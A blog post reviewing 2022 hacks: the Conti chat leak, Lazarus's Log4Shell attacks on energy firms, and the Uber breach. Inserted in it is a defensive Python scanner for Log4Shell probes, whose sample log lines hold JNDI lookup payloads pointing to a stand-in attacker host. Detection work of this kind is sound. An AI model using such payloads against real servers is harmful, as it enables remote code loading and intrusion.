Top hacks 2022 (part 1)

Maksym Tsiutsiura
3 min read · Jan 6, 2023


2022 has ended, so we can summarize the year. In this article, we briefly analyze some of the biggest cyber attacks around the world.

Hacking the hacker group Conti

The Conti ransomware group is one of the largest ransomware groups in existence. It was behind multiple hacks of high-profile organizations, including the governments of Costa Rica and Peru, multiple retailers, and critical infrastructure such as the Irish healthcare service.

In February 2022, after the group declared support for the Russian government following the invasion of Ukraine, a researcher leaked the contents of the group’s private chats, revealing many internal details of how the organization functioned. According to the latest reports, in May 2022 the Conti ransomware group decided to reorganize and rebrand; however, it is likely to continue to function by working with smaller groups. This could result in a greater diversity of high-quality ransomware with increased coordination between former members of the Conti ransomware group.

North Korea’s Lazarus hackers are exploiting Log4j flaw to hack US energy companies

Threat intelligence company Cisco Talos said that it has observed Lazarus — also known as APT38 — targeting unnamed energy providers in the United States, Canada and Japan between February and July 2022. According to Cisco’s research, the hackers used a year-old vulnerability in Log4j, known as Log4Shell, to compromise internet-exposed VMware Horizon servers and establish an initial foothold in a victim’s enterprise network, before deploying bespoke malware known as “VSingle” and “YamaBot” to establish long-term persistent access. YamaBot was recently attributed to the Lazarus APT by Japan’s national cyber emergency response team, known as CERT.
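As an added defensive example (not code from the original article, Cisco Talos or VMware), the following Python scanner flags Log4Shell lookup strings in web-server access logs of the kind a Horizon server would write. The log lines, hostnames and paths are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Log4j lookup forms that are commonly nested to hide the literal "jndi" token:
# ${lower:j} / ${upper:J} -> j ; ${anything:-j} (default-value syntax) -> j
_NESTED = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}", re.I)
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.I)


def normalize(s: str) -> str:
    """Percent-decode (up to three layers) and collapse nested lookups until stable."""
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:  # resolve lookups inside-out until nothing changes
        prev = s
        s = _NESTED.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after normalization."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (line_number, line) for every line that looks like a Log4Shell probe."""
    return [(i, line) for i, line in enumerate(lines, 1) if is_log4shell_probe(line)]


# Constructed access-log lines (hypothetical hosts and paths, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Feb/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://attacker.example:1389/a}"',
    '10.0.0.9 - - [12/Feb/2022:10:01:09 +0000] "GET /login HTTP/1.1" 200 88 "-" "%24%7Bjndi%3Aldap%3A%2F%2Fattacker.example%2Fb%7D"',
    '10.0.0.9 - - [12/Feb/2022:10:01:11 +0000] "GET /login HTTP/1.1" 200 88 "-" "${${lower:j}ndi:rmi://attacker.example/c}"',
    '10.0.0.7 - - [12/Feb/2022:10:02:00 +0000] "GET /static/app.js?v=${build} HTTP/1.1" 200 9000 "-" "curl/7.68"',
]

if __name__ == "__main__":
    for number, line in scan(SAMPLE_LOG):
        print(f"line {number}: {line}")
```

Any hit should be correlated with the Horizon server's own logs and outbound LDAP/RMI connections, since a probe in the User-Agent field alone does not prove the server was vulnerable at the time.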

Details of this espionage campaign were first revealed by Symantec in April 2022, which attributed the operation to “Stonefly,” another North Korean hacking group that has some overlaps with Lazarus.

How Uber was hacked — again

An 18-year-old hacker used social engineering techniques to compromise Uber’s network. He compromised an employee’s Slack login and then used it to send a message to Uber employees announcing that the company had suffered a data breach. Uber confirmed the attack on Twitter within hours and published more details on its website. The company claims no user data was at risk, that it has notified law enforcement, and that all of its services have been restored to operational status (there were brief interruptions of various software tools, but they are back online too). Uber now believes the hacker is part of a hacking group called Lapsus$.

What’s interesting about this incident is the speed at which various publications and security analysts provided coverage, how quickly Uber notified the world, and how much detail we already have about what happened. Contrast this with another Uber hack back in 2016, when the personal information of about 57 million customers and drivers was stolen. That breach wasn’t made public for more than a year and resulted in Uber firing its Chief Security Officer, Joseph Sullivan. He is currently on trial for allegedly arranging to pay the hackers $100,000 to cover things up and for the delay in disclosing the breach. The hackers were supposedly forced to sign non-disclosure agreements, an odd way to deal with a breach, to be sure.

If you know of other interesting hacks from 2022, send them by e-mail to formediumblogs@gmail.com for coverage or start a discussion in the comments.
